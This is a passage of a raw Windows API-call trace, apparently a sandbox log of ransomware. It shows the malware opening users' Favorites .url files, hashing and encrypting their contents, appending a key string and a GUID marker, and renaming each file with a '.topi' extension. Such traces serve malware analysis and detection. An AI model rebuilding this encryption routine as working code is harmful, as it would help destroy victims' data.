hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.500] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.topi")) returned 1 [0096.501] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.501] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.501] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.502] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0096.502] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0096.502] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned=".url" [0096.502] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.503] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=133) returned 1 [0096.503] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.505] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.505] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.506] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.507] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.507] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.507] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.508] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.508] GetLastError () returned 0x0 [0096.508] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.508] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.508] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.508] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.508] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0096.508] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02948 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98e8 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02990 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6d4bd0 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03438 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03450 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03468 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.509] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.509] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.509] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03468 | out: hHeap=0x680000) returned 1 [0096.509] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03450 | out: hHeap=0x680000) returned 1 [0096.509] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.509] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03438 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x9a03450 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x9a03468 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03450 | out: hHeap=0x680000) returned 1 [0096.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03468 | out: hHeap=0x680000) returned 1 [0096.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.510] GetCurrentThreadId () returned 0x8c4 [0096.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f7fe0 [0096.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.510] GetCurrentThreadId () returned 0x8c4 [0096.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4988 [0096.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49a0 [0096.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0096.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49b8 [0096.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.512] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.512] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.512] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49e8 [0096.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.512] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a00 [0096.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.512] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.512] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a30 [0096.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.512] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a18 [0096.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a00 | out: hHeap=0x680000) returned 1 [0096.512] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0096.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.512] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.512] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49a0 | out: hHeap=0x680000) returned 1 [0096.512] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49a0 [0096.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.512] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.512] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.512] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.512] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.513] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49a0 | out: hHeap=0x680000) returned 1 [0096.513] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.513] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49e8 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49b8 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d4bd0 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02990 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.514] WriteFile (in: hFile=0x6a8, lpBuffer=0x31b3ff8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x31b3ff8*, lpNumberOfBytesWritten=0x9ccfb14*=0x80, lpOverlapped=0x0) returned 1 [0096.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0096.514] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.514] WriteFile (in: hFile=0x6a8, lpBuffer=0x99def60*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99def60*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.514] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.514] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0096.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.514] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0096.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.514] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.514] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.514] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.515] CloseHandle (hObject=0x6a8) returned 1 [0096.515] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.515] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0096.515] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0096.516] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.topi")) returned 1 [0096.516] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.516] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.516] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.517] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0096.517] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0096.517] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.518] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0096.518] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.518] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned=".url" [0096.518] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.519] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=133) returned 1 [0096.519] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.522] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x5f, lpNewFilePointer=0x0, 